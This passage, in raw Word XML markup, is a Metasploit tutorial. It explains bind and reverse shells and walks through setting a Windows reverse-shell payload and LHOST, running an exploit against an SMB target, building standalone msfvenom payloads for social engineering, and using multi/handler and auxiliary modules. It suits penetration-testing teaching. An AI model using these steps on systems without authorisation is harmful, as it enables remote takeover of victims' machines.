          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to show the available payloads and which are compatible with the detected vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:jc w:val="center"/>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4438650" cy="2524125"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11"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4438650"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both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don’t set a payload, the exploit module will choose a default payload and the necessary configurations to execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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25">
      <w:pPr>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Test Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the command exploit to tell Metasploit to execute the chosen module. By doing this, a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> session will start.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this example, we are going to set a reverse shell payload, so first, let’s see </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">what are reverse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and bind </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shells</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28">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bind Shell</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:ind w:left="72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Instructs the victim’s computer to open a command shell and listen to a local port. The attacker’s machine will connect on the victim’s computer through the port that is listening. However, because of firewalls the efficiency of bind shells has decreased. </w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:ind w:left="72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2B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>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Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:ind w:left="72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Forces a connection back to the attacker’s computer, instead of waiting for a connection. In this case, the attacker opens a local port and keeps listening on it, waiting for the victim to connect on this port. It’s easier for this attack to bypass firewalls, since if the attacker configures port 80 or 443 to be listened to, the firewall will allow the communication as it will interpret as a regular web access. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:ind w:left="720"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2E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>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Setting a payload manually</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>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set payload windows/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="216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Setting a windows reverse shell as our payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>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show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="216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Check our payload options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>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ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="216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Checking your own IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>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set LHOST [ip address]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="216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With LHOST, you set your local IP address / attacker’s IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="144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Not setting any port or any target, which means leaving default </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RPORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and default Target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="216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Command to execute the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">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3B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When we executed the exploit, Metasploit opened a listener on port 4444 (default for this exploit) to capture the target reverse shell. As we kept the target as default automatic targeting, Metasploit identified the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB remote server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and selected the appropriate target to exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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3D">
      <w:pPr>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Msfvenom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Msfvenom allows us to create </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">standalone payloads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be executed in a target system, in an attempt of exploiting the user, through social engineering attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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msfvenom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l payloads </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="144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Lists available payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:jc w:val="center"/>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5731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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msfvenom –list formats</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="144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Lists all formats available </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>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4267200" cy="2628900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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42672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47">
      <w:pPr>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48">
      <w:pPr>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→Standalone Payloads: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script or malicious program that performs the malicious action.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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4A">
      <w:pPr>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Multi/Handler Module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This module allows us to set </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">standalone handlers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we need it to capture our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection when your standalone payload is executed on the victim’s machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>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4F">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50">
      <w:pPr>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Using an Auxiliary Module </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Auxiliary Modules help on all pentesting phases, but aren’t used to exploit vulnerabilities. Those include resources like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability scan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> fuzzers </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> even DDoS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The vulnerability exploit modules use payloads, auxiliary modules don’t.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="144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Starts msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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show auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="144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Shows auxiliary modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:jc w:val="both"/>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5731200" cy="3187700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4"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7312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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of the RHOST option, we will have RHOSTS, which allows us to specify more than one remote host in which the module will be executed. Auxiliary Modules can be executed in multiple hosts, while exploits can only exploit one system at a time. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">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5A">
      <w:pPr>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Attack Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
